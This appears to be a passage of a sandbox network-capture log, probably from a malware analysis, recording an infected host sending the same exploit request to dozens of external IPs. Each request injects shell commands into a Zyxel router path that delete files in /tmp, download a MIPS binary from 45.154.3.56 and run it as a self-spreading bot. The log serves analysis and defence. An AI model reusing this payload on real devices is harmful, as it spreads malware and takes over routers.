                        Session IDSource IPSource PortDestination IPDestination Port
                        1788192.168.2.143561832.242.134.88443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.122603893 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1789192.168.2.1441004202.1.194.122443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.122651100 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1790192.168.2.145638872.176.33.112443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.122664928 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1791192.168.2.1444994154.131.172.135443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.122726917 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1792192.168.2.1456566200.85.77.96443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.122756958 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1793192.168.2.144331667.39.46.227443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.122812033 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1794192.168.2.1460874126.179.130.75443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.122863054 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1795192.168.2.145294672.250.79.10443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.122916937 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1796192.168.2.1444290108.40.78.24443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.122936964 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1797192.168.2.1436642106.148.14.232443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.122973919 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1798192.168.2.144679071.154.52.36443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.123039007 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1799192.168.2.145137662.152.54.166443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.123071909 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1800192.168.2.143489618.211.145.89443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.123122931 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1801192.168.2.1452606155.182.215.181443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.123168945 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1802192.168.2.1440070156.187.89.134443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.123203039 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1803192.168.2.1454538176.232.85.64443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.123260021 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1804192.168.2.143822465.99.61.86443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.123284101 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1805192.168.2.1447980177.165.210.77443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.123331070 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1806192.168.2.1459704113.219.169.233443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.123390913 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1807192.168.2.1438082109.30.182.237443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.123430967 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1808192.168.2.1444774164.203.40.55443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.123457909 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1809192.168.2.145769070.226.99.63443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.123522043 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1810192.168.2.1442170125.234.65.187443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.123559952 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1811192.168.2.1445670120.35.225.32443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.123589039 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1812192.168.2.1454410156.198.114.244443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.123645067 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1813192.168.2.1456016183.167.4.209443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.123702049 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1814192.168.2.14582565.121.86.161443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.123749018 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1815192.168.2.1438508153.108.56.177443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.123794079 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1816192.168.2.145067280.54.218.71443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.123857975 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1817192.168.2.145282237.18.244.254443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.123902082 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1818192.168.2.1444094210.47.79.54443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.123939037 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1819192.168.2.1437124196.234.153.183443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.123974085 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1820192.168.2.1458594163.17.215.78443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.124020100 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1821192.168.2.1460628217.231.150.181443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.124082088 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1822192.168.2.144815265.166.71.220443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.124109983 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1823192.168.2.1456502113.153.166.125443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.124141932 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1824192.168.2.144618446.41.224.152443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.124181986 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1825192.168.2.1443406178.57.193.45443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.124228001 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1826192.168.2.143879659.105.80.83443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.124283075 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1827192.168.2.145444042.253.9.83443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.124324083 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1828192.168.2.1432878144.161.222.54443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.124363899 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1829192.168.2.1443102164.37.137.110443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.124417067 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1830192.168.2.1458920152.113.179.237443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.124461889 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1831192.168.2.1436410172.246.207.157443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.124512911 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1832192.168.2.1448350148.30.242.14443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.124547958 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1833192.168.2.1444374209.241.170.197443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.124608040 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1834192.168.2.1454526193.87.40.225443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.124653101 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1835192.168.2.1435964153.130.148.63443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.124699116 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1836192.168.2.1447710119.87.211.49443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.124747992 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1837192.168.2.1451680212.23.241.148443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.124774933 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1838192.168.2.1433900187.200.226.194443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.124835968 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1839192.168.2.1435050101.218.117.243443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.124871969 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1840192.168.2.1436780170.88.100.212443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.124912977 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1841192.168.2.145433467.110.141.23443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.124939919 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1842192.168.2.144052248.114.43.83443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.125003099 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1843192.168.2.146027017.98.14.168443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.125036955 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1844192.168.2.1439708172.33.211.196443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.125075102 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1845192.168.2.1458150206.109.7.44443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.125099897 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1846192.168.2.144587054.163.101.217443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.125142097 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1847192.168.2.143431262.6.157.213443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.125211000 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1848192.168.2.146074065.207.113.235443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.125252008 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1849192.168.2.144494217.224.178.151443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.125277042 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1850192.168.2.145014035.208.147.17443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.125303030 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1851192.168.2.144758688.149.56.214443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.125375986 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1852192.168.2.1433110154.23.237.81443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.125396967 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1853192.168.2.143831481.151.168.66443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.125458956 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1854192.168.2.144478667.131.176.181443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.125490904 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1855192.168.2.1443164184.66.225.8443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.125545979 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1856192.168.2.1449602217.242.39.114443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.125595093 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1857192.168.2.1460884183.104.113.65443
                        TimestampBytes transferredDirectionData
